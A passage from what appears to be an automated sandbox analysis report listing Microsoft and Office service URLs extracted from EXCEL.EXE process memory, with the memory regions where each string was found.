      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonhw
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxs
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControlSyc
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13$
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.net$
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect%x5
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventslJ
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://roaming.edog.
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airl
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWriter~
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com6
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com:
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com=
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comB
      Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com_
